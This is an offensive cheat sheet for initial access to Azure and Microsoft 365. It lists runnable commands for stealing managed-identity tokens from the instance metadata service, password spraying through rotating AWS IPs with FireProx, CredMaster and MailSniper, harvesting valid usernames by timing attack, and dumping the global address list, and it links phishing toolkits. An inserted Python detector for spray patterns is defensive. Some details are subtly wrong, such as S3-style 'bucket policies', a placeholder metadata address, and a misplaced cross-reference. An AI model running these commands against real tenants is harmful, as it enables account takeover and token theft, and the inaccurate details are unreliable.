Initial Access
Getting an initial foothold in an organization's Azure cloud environment:
Exploiting Web App
- Public Azure Instances
Misconfigured Azure Instances can be publicly accessible, allowing unauthorized users to read, write, or delete the contents. Ensuring proper bucket policies and access controls is critical to prevent data leakage.
If we can exploit a public-facing application, we can retrieve an access token for the managed identity attached to the VM:
curl -H "Metadata:true" "http://{instance IP}/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
PowerShell one-liner that retrieves an OAuth2 token for the managed identity and the instance metadata from the Azure Instance Metadata Service (IMDS):
$token = Invoke-WebRequest -Uri 'http://{instance IP}/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing; $instance = Invoke-WebRequest -Uri 'http://{instance IP}/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing; $instance
Valid Credential
- Password Spray
MSOLSpray + FireProx
To perform password spraying with MSOLSpray, using FireProx so that each request comes from a different AWS IP:
python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --region <region> --url https://login.microsoft.com --command create
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://apigateway-endpoint-id.execute-api.us-east-1.amazonaws.com/fireprox
CredMaster
Password spraying through AWS can also be automated against O365 and other services with CredMaster (https://github.com/knavesec/CredMaster):
python3 credmaster.py --plugin o365 -u users.txt -p passwords.txt -a useragents.txt --config aws.config
MailSniper.ps1
Import MailSniper.ps1:
ipmo C:\Tools\MailSniper\MailSniper.ps1
Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.
Invoke-DomainHarvestOWA -ExchHostname {url of the exchange server}
Then we need valid usernames from the list of users enumerated earlier (OSINT/Username OSINT section).
Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.
Invoke-UsernameHarvestOWA -ExchHostname {url of the exchange server} -Domain {domain previously extracted} -UserList {username list} -OutFile .\Desktop\valid.txt
MailSniper can spray passwords against the valid account(s) identified using Outlook Web Access (OWA), Exchange Web Services (EWS) and Exchange ActiveSync (EAS).
Invoke-PasswordSprayOWA -ExchHostname {url of the exchange server} -UserList .\Desktop\valid.txt -Password Summer2022
These authentication attempts may count towards the domain lockout policy for the users. Too many attempts in a short space of time are not only loud but may also lock accounts out.
To download the global address list with valid creds:
Get-GlobalAddressList -ExchHostname {url of the exchange server} -UserName {domain}\{user} -Password Summer2022 -OutFile .\Desktop\gal.txt
If there are names here that we didn't find during initial recon, we can go back and do another round of spraying against them.
o365spray
https://github.com/0xZDH/o365spray
SprayingToolkit
https://github.com/byt3bl33d3r/SprayingToolkit
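A detection-side counterpart to the spraying tools above, added here as an example and not part of the original page or of any of those tools: it groups failed sign-ins by time window rather than by source IP, so the per-request IP rotation that FireProx and CredMaster provide does not hide the pattern, and it surfaces any success that lands in the same window. The event fields and error codes are a constructed approximation of Entra ID sign-in log exports, not real tenant data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in events, not real tenant data. Field names loosely
# follow Entra ID sign-in log exports; errorCode 0 = success, 50126 = bad password.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T08:00:05Z", "user": "alice@corp.example", "ip": "3.1.1.10", "errorCode": 50126},
    {"time": "2024-03-01T08:00:09Z", "user": "bob@corp.example", "ip": "3.1.1.11", "errorCode": 50126},
    {"time": "2024-03-01T08:00:14Z", "user": "carol@corp.example", "ip": "3.1.1.12", "errorCode": 50126},
    {"time": "2024-03-01T08:00:20Z", "user": "dave@corp.example", "ip": "3.1.1.13", "errorCode": 50126},
    {"time": "2024-03-01T08:00:27Z", "user": "erin@corp.example", "ip": "3.1.1.14", "errorCode": 50126},
    {"time": "2024-03-01T08:00:33Z", "user": "frank@corp.example", "ip": "3.1.1.15", "errorCode": 0},
    # One user mistyping a password several times is noisy but not a spray.
    {"time": "2024-03-01T09:30:01Z", "user": "grace@corp.example", "ip": "198.51.100.7", "errorCode": 50126},
    {"time": "2024-03-01T09:30:12Z", "user": "grace@corp.example", "ip": "198.51.100.7", "errorCode": 50126},
    {"time": "2024-03-01T09:30:25Z", "user": "grace@corp.example", "ip": "198.51.100.7", "errorCode": 50126},
    {"time": "2024-03-01T09:30:40Z", "user": "grace@corp.example", "ip": "198.51.100.7", "errorCode": 50126},
]
BAD_PASSWORD = 50126


def detect_spray(events, window_minutes=10, min_users=5, max_per_user=2):
    """One alert per fixed time bucket in which many distinct users each fail
    only a few times. Buckets are keyed on time alone, so per-request source
    IP rotation (FireProx, CredMaster) does not split the pattern apart."""
    failures = defaultdict(lambda: defaultdict(int))  # bucket -> user -> count
    fail_ips = defaultdict(set)                       # bucket -> failing source IPs
    successes = defaultdict(set)                      # bucket -> users that got in
    for ev in events:
        ts = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
        bucket = ts - timedelta(minutes=ts.minute % window_minutes, seconds=ts.second)
        if ev["errorCode"] == BAD_PASSWORD:
            failures[bucket][ev["user"]] += 1
            fail_ips[bucket].add(ev["ip"])
        elif ev["errorCode"] == 0:
            successes[bucket].add(ev["user"])
    alerts = []
    for bucket, per_user in sorted(failures.items()):
        sprayed = sorted(u for u, n in per_user.items() if n <= max_per_user)
        if len(sprayed) >= min_users:
            alerts.append({
                "window_start": bucket.isoformat(),
                "users": sprayed,
                "source_ips": len(fail_ips[bucket]),
                # A success in the same window is a likely hit from the spray.
                "successes": sorted(successes[bucket]),
            })
    return alerts
```

Keep max_per_user below the tenant's smart lockout threshold so a spray tuned to stay under lockout (the concern raised for MailSniper below) still trips the rule.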
- Phishing, AiTM, Illicit Consent Grant Attack, …
To perform OAuth phishing attacks: https://github.com/mdsecactivebreach/o365-attack-toolkit
To send internal phishing with compromised credentials via EWS: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/b834ca28c5a8d392bd14e8e4e380d42c4a8fc318/Send-EWSEmail.ps1
Leaked Credential